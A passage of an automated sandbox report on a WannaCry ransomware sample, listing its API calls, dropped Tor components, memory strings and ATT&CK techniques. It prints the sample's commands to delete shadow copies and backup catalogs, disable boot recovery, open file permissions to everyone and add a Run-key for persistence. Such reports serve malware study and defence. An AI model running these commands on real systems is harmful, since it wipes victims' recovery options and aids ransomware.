                  Source: Binary string: DC:\Users\All Users\Application Data\Application Data\SoftwareDistributionoudStore8bbwed.pdb8bbw source: WannaCrypt0r.sk, 00000005.00000003.3698905000.0000000002594000.00000004.00000020.00020000.00000000.sdmp, WannaCrypt0r.sk, 00000005.00000003.3742479647.0000000002599000.00000004.00000020.00020000.00000000.sdmp, WannaCrypt0r.sk, 00000005.00000003.3697563659.0000000002545000.00000004.00000020.00020000.00000000.sdmp
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_00413060 push eax; ret 25_2_0041308E
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 28_2_00413060 push eax; ret 28_2_0041308E
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 37_2_00413060 push eax; ret 37_2_0041308E
                  Source: libeay32.dll.25.drStatic PE information: section name: /4
                  Source: libeay32.dll.25.drStatic PE information: section name: /19
                  Source: libeay32.dll.25.drStatic PE information: section name: /31
                  Source: libeay32.dll.25.drStatic PE information: section name: /45
                  Source: libeay32.dll.25.drStatic PE information: section name: /57
                  Source: libeay32.dll.25.drStatic PE information: section name: /70
                  Source: libeay32.dll.25.drStatic PE information: section name: /81
                  Source: libeay32.dll.25.drStatic PE information: section name: /92
                  Source: libevent-2-0-5.dll.25.drStatic PE information: section name: /4
                  Source: libevent-2-0-5.dll.25.drStatic PE information: section name: /19
                  Source: libevent-2-0-5.dll.25.drStatic PE information: section name: /31
                  Source: libevent-2-0-5.dll.25.drStatic PE information: section name: /45
                  Source: libevent-2-0-5.dll.25.drStatic PE information: section name: /57
                  Source: libevent-2-0-5.dll.25.drStatic PE information: section name: /70
                  Source: libevent-2-0-5.dll.25.drStatic PE information: section name: /81
                  Source: libevent-2-0-5.dll.25.drStatic PE information: section name: /92
                  Source: libevent_core-2-0-5.dll.25.drStatic PE information: section name: /4
                  Source: libevent_core-2-0-5.dll.25.drStatic PE information: section name: /19
                  Source: libevent_core-2-0-5.dll.25.drStatic PE information: section name: /31
                  Source: libevent_core-2-0-5.dll.25.drStatic PE information: section name: /45
                  Source: libevent_core-2-0-5.dll.25.drStatic PE information: section name: /57
                  Source: libevent_core-2-0-5.dll.25.drStatic PE information: section name: /70
                  Source: libevent_core-2-0-5.dll.25.drStatic PE information: section name: /81
                  Source: libevent_core-2-0-5.dll.25.drStatic PE information: section name: /92
                  Source: libevent_extra-2-0-5.dll.25.drStatic PE information: section name: /4
                  Source: libevent_extra-2-0-5.dll.25.drStatic PE information: section name: /19
                  Source: libevent_extra-2-0-5.dll.25.drStatic PE information: section name: /31
                  Source: libevent_extra-2-0-5.dll.25.drStatic PE information: section name: /45
                  Source: libevent_extra-2-0-5.dll.25.drStatic PE information: section name: /57
                  Source: libevent_extra-2-0-5.dll.25.drStatic PE information: section name: /70
                  Source: libevent_extra-2-0-5.dll.25.drStatic PE information: section name: /81
                  Source: libevent_extra-2-0-5.dll.25.drStatic PE information: section name: /92
                  Source: libgcc_s_sjlj-1.dll.25.drStatic PE information: section name: /4
                  Source: libgcc_s_sjlj-1.dll.25.drStatic PE information: section name: /19
                  Source: libgcc_s_sjlj-1.dll.25.drStatic PE information: section name: /31
                  Source: libgcc_s_sjlj-1.dll.25.drStatic PE information: section name: /45
                  Source: libgcc_s_sjlj-1.dll.25.drStatic PE information: section name: /57
                  Source: libgcc_s_sjlj-1.dll.25.drStatic PE information: section name: /70
                  Source: libgcc_s_sjlj-1.dll.25.drStatic PE information: section name: /81
                  Source: libgcc_s_sjlj-1.dll.25.drStatic PE information: section name: /92
                  Source: libssp-0.dll.25.drStatic PE information: section name: /4
                  Source: libssp-0.dll.25.drStatic PE information: section name: /19
                  Source: libssp-0.dll.25.drStatic PE information: section name: /31
                  Source: libssp-0.dll.25.drStatic PE information: section name: /45
                  Source: libssp-0.dll.25.drStatic PE information: section name: /57
                  Source: libssp-0.dll.25.drStatic PE information: section name: /70
                  Source: libssp-0.dll.25.drStatic PE information: section name: /81
                  Source: libssp-0.dll.25.drStatic PE information: section name: /92
                  Source: ssleay32.dll.25.drStatic PE information: section name: /4
                  Source: ssleay32.dll.25.drStatic PE information: section name: /19
                  Source: ssleay32.dll.25.drStatic PE information: section name: /31
                  Source: ssleay32.dll.25.drStatic PE information: section name: /45
                  Source: ssleay32.dll.25.drStatic PE information: section name: /57
                  Source: ssleay32.dll.25.drStatic PE information: section name: /70
                  Source: ssleay32.dll.25.drStatic PE information: section name: /81
                  Source: ssleay32.dll.25.drStatic PE information: section name: /92
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_00404B70 CryptAcquireContextA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CryptAcquireContextA,CryptImportKey,CryptDestroyKey,CryptEncrypt,CryptDecrypt,25_2_00404B70

                  Persistence and Installation Behavior

                  Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\Desktop\m.vbs
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\Documents\@WanaDecryptor@.exe
                  Source: C:\Windows\System32\certutil.exeFile created: C:\Users\user\Desktop\WannaCrypt0r.sk
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\Desktop\u.wnry
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\Public\Desktop\@WanaDecryptor@.exe
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\Desktop\taskdl.exe
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeFile created: C:\Users\user\Desktop\TaskData\Tor\libssp-0.dll
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeFile created: C:\Users\user\Desktop\TaskData\Tor\libgcc_s_sjlj-1.dll
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\Desktop\@WanaDecryptor@.exe
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeFile created: C:\Users\user\Desktop\TaskData\Tor\libevent-2-0-5.dll
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\@WanaDecryptor@.exe
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeFile created: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\Default\Desktop\@WanaDecryptor@.exe
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeFile created: C:\Users\user\Desktop\TaskData\Tor\ssleay32.dll
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\Desktop\taskse.exe
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeFile created: C:\Users\user\Desktop\TaskData\Tor\libeay32.dll
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\@WanaDecryptor@.exe
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\Downloads\@WanaDecryptor@.exe
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeFile created: C:\Users\user\Desktop\TaskData\Tor\libevent_extra-2-0-5.dll
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeFile created: C:\Users\user\Desktop\TaskData\Tor\libevent_core-2-0-5.dll
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeFile created: C:\Users\user\Desktop\TaskData\Tor\tor.exe
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeFile created: C:\Users\user\Desktop\TaskData\Tor\zlib1.dll
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\~SDE14B.tmpJump to behavior
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\~SDE14C.tmpJump to behavior
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Java\~SDE14D.tmpJump to behavior
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\~SDE360.tmpJump to behavior
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\~SDE361.tmpJump to behavior

                  Hooking and other Techniques for Hiding and Protection

                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\$Recycle.Bin\~SDDF8D.tmp
                  Source: @WanaDecryptor@.exe, 00000019.00000003.4365502561.000000000289A000.00000004.00000020.00020000.00000000.sdmp, taskhsvc.exe, 0000001D.00000000.4371285563.000000000081C000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: onion-port
                  Source: c:\users\user\desktop\wannacry.cmdFile moved: C:\Users\user\AppData\Local\Temp\30.WNCRYT
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_004067F0 IsIconic,#470,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,#755,#2379,25_2_004067F0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 28_2_004067F0 IsIconic,#470,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,#755,#2379,28_2_004067F0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 37_2_004067F0 IsIconic,#470,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,#755,#2379,37_2_004067F0
                  Source: C:\Users\user\Desktop\taskse.exeCode function: 36_2_00401000 Sleep,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,LoadLibraryA,GetProcAddress,LookupPrivilegeValueA,AdjustTokenPrivileges,_local_unwind2,WaitForSingleObject,_local_unwind2,36_2_00401000
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skProcess created: C:\Windows\SysWOW64\icacls.exe icacls . /grant Everyone:F /T /C /Q
                  Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\Desktop\WannaCry.cmd count: 36242
                  Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\Desktop\WANNACRY.bin count: 36237
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_0040D30025_2_0040D300
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_0040D4C025_2_0040D4C0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 28_2_0040D30028_2_0040D300
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 28_2_0040D4C028_2_0040D4C0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 37_2_0040D30037_2_0040D300
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 37_2_0040D4C037_2_0040D4C0
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\taskdl.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\taskse.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exe Dropped PE file which has not been started: C:\Users\user\Desktop\TaskData\Tor\libevent_extra-2-0-5.dll
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exe Dropped PE file which has not been started: C:\Users\user\Desktop\TaskData\Tor\libevent_core-2-0-5.dll
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exe Evaded block: after key decision graph_25-5437
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exe Evaded block: after key decision graph_28-4667
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exe Evaded block: after key decision graph_28-5519
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exe Evaded block: after key decision graph_37-5473
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exe API coverage: 8.5 %
                  Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe Process information queried: ProcessInformation
                  Source: C:\Users\user\Desktop\taskdl.exeCode function: 10_2_00401080 GetDriveTypeW,Sleep,swprintf,swprintf,FindFirstFileW,swprintf,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z,?_Eos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXI@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,FindNextFileW,FindClose,DeleteFileW,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,DeleteFileW,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,10_2_00401080
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_004080C0 __p___argv,FindFirstFileA,fopen,fread,sscanf,fopen,fread,fclose,FindNextFileA,FindClose,sprintf,#537,#537,25_2_004080C0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_00403CB0 FindFirstFileA,SendMessageA,SendMessageA,sscanf,fopen,fread,sprintf,SendMessageA,#823,SendMessageA,fclose,FindNextFileA,FindClose,25_2_00403CB0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_004026B0 swprintf,FindFirstFileW,#825,#825,wcscmp,wcslen,wcscmp,wcscmp,swprintf,GetFileAttributesW,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z,wcscmp,wcscmp,wcscmp,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,FindNextFileW,FindClose,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,swprintf,swprintf,DeleteFileW,swprintf,DeleteFileW,#825,#825,25_2_004026B0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 28_2_004080C0 __p___argv,FindFirstFileA,fopen,fread,sscanf,fopen,fread,fclose,FindNextFileA,FindClose,sprintf,#537,#537,28_2_004080C0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 28_2_00403CB0 FindFirstFileA,SendMessageA,SendMessageA,sscanf,fopen,fread,sprintf,SendMessageA,#823,SendMessageA,fclose,FindNextFileA,FindClose,28_2_00403CB0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 28_2_004026B0 swprintf,FindFirstFileW,#825,#825,wcscmp,wcslen,wcscmp,wcscmp,swprintf,GetFileAttributesW,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z,wcscmp,wcscmp,wcscmp,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,FindNextFileW,FindClose,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,swprintf,swprintf,DeleteFileW,swprintf,DeleteFileW,#825,#825,28_2_004026B0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 37_2_004080C0 __p___argv,FindFirstFileA,fopen,fread,sscanf,fopen,fread,fclose,FindNextFileA,FindClose,sprintf,#537,#537,37_2_004080C0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 37_2_00403CB0 FindFirstFileA,SendMessageA,SendMessageA,sscanf,fopen,fread,sprintf,SendMessageA,#823,SendMessageA,fclose,FindNextFileA,FindClose,37_2_00403CB0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 37_2_004026B0 swprintf,FindFirstFileW,#825,#825,wcscmp,wcslen,wcscmp,wcscmp,swprintf,GetFileAttributesW,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z,wcscmp,wcscmp,wcscmp,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,FindNextFileW,FindClose,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,swprintf,swprintf,DeleteFileW,swprintf,DeleteFileW,#825,#825,37_2_004026B0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exe API call chain: ExitProcess graph end node graph_25-4857
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exe API call chain: ExitProcess graph end node graph_25-4868
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exe API call chain: ExitProcess graph end node graph_25-4814
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exe API call chain: ExitProcess graph end node graph_25-4692
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exe API call chain: ExitProcess graph end node graph_28-4733
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exe API call chain: ExitProcess graph end node graph_28-4750
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exe API call chain: ExitProcess graph end node graph_28-5467
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exe API call chain: ExitProcess graph end node graph_37-5286
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exe API call chain: ExitProcess graph end node graph_37-5163
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exe API call chain: ExitProcess graph end node graph_37-5262
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exe API call chain: ExitProcess graph end node graph_37-5537
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\~SDE034.tmpJump to behavior
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\~SDE033.tmpJump to behavior
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\~SDE037.tmpJump to behavior
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\~SDE038.tmpJump to behavior
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\ARM\~SDE035.tmpJump to behavior
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Temp\~SDE036.tmpJump to behavior
                  Source: certutil.exe, 00000004.00000003.2978492968.000001846EB02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tNuBT9Tmk3XowV5s0DCjjM5QEmUH8y0NScjNfok8ZIiVqq4hLSY37gRClL+z7TIy
                  Source: taskhsvc.exe, 0000001D.00000003.7105840816.00000000042FD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4n1U+eznQ3iTAy1smqeMuE/pCIfdVpSJnagimVFQTmQ
                  Source: @WanaDecryptor@.exe, 00000019.00000002.7375727368.00000000004C2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllR
                  Source: taskhsvc.exe, 0000001D.00000003.4423866724.0000000004785000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: m 4n1U+eznQ3iTAy1smqeMuE/pCIfdVpSJnagimVFQTmQ
                  Source: taskhsvc.exe, 0000001D.00000003.7105840816.00000000042FD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4n1U+eznQ3iTAy1smqeMuE/pCIfdVpSJnagimVFQTmQu2ME
                  Source: @WanaDecryptor@.exe, 0000001C.00000002.4451269270.0000000000797000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exe Code function: 25_2_00404B70 CryptAcquireContextA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CryptAcquireContextA,CryptImportKey,CryptDestroyKey,CryptEncrypt,CryptDecrypt,25_2_00404B70
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\msg.exe msg * Has Sido Hackeado!
                  Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe //nologo m.vbs
                  Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe vs
                  Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic shadowcopy delete
                  Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "vfwrglgamdagtoq456" /t REG_SZ /d "\"C:\Users\user\Desktop\tasksche.exe\"" /f
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exe Code function: 25_2_00401BB0 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,25_2_00401BB0
                  Source: C:\Windows\SysWOW64\cscript.exe Queries volume information: C:\ VolumeInformation
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exe Code function: SendMessageA,GetUserDefaultLangID,GetLocaleInfoA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,25_2_00406C20
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exe Code function: SendMessageA,GetUserDefaultLangID,GetLocaleInfoA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,28_2_00406C20
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exe Code function: SendMessageA,GetUserDefaultLangID,GetLocaleInfoA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,37_2_00406C20
                  Source: C:\Windows\SysWOW64\cscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_00406F80 SendMessageA,CreateSolidBrush,CreateSolidBrush,#1641,CreateSolidBrush,#1641,CreateSolidBrush,#1641,CreateSolidBrush,#1641,CreateSolidBrush,#1641,CreateSolidBrush,#1641,CreateSolidBrush,#1641,CreateSolidBrush,#1641,CreateSolidBrush,#1641,CreateSolidBrush,#1641,CreateFontA,CreateFontA,#1641,CreateFontA,#1641,CreateFontA,#1641,#3092,SendMessageA,SendMessageA,#3092,SendMessageA,#3092,SendMessageA,#3092,SendMessageA,#3092,SendMessageA,#3092,SendMessageA,#3092,SendMessageA,#3092,SendMessageA,#3092,SendMessageA,#3092,SendMessageA,#3092,SendMessageA,#860,#537,#537,#540,#2818,#535,#2818,#535,SendMessageA,SendMessageA,#6140,#6140,GetTimeZoneInformation,SystemTimeToTzSpecificLocalTime,SystemTimeToTzSpecificLocalTime,#2818,SystemTimeToTzSpecificLocalTime,#2818,#6334,#800,25_2_00406F80
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exe Code function: 25_2_0040BED0 #823,GetComputerNameA,GetUserNameA,25_2_0040BED0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exe Code function: 25_2_0040D6A0 htons,socket,bind,ioctlsocket,ioctlsocket,connect,select,__WSAFDIsSet,__WSAFDIsSet,ioctlsocket,setsockopt,setsockopt,setsockopt,closesocket,25_2_0040D6A0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exe Code function: 28_2_0040D6A0 htons,socket,bind,ioctlsocket,ioctlsocket,connect,select,__WSAFDIsSet,__WSAFDIsSet,ioctlsocket,setsockopt,setsockopt,setsockopt,closesocket,28_2_0040D6A0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exe Code function: 37_2_0040D6A0 htons,socket,bind,ioctlsocket,ioctlsocket,connect,select,__WSAFDIsSet,__WSAFDIsSet,ioctlsocket,setsockopt,setsockopt,setsockopt,closesocket,37_2_0040D6A0
                  Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
                  Valid Accounts12
                  Scripting
                  1
                  DLL Side-Loading
                  1
                  DLL Side-Loading
                  12
                  Scripting
                  OS Credential Dumping1
                  System Time Discovery
                  Remote Services12
                  Archive Collected Data
                  Exfiltration Over Other Network Medium1
                  Ingress Tool Transfer
                  Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization21
                  Data Encrypted for Impact
                  Default Accounts21
                  Native API
                  1
                  Registry Run Keys / Startup Folder
                  1
                  Access Token Manipulation
                  1
                  Obfuscated Files or Information
                  LSASS Memory1
                  Account Discovery
                  Remote Desktop Protocol11
                  Clipboard Data
                  Exfiltration Over Bluetooth22
                  Encrypted Channel
                  Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without Authorization1
                  Inhibit System Recovery
                  Domain Accounts2
                  Command and Scripting Interpreter
                  1
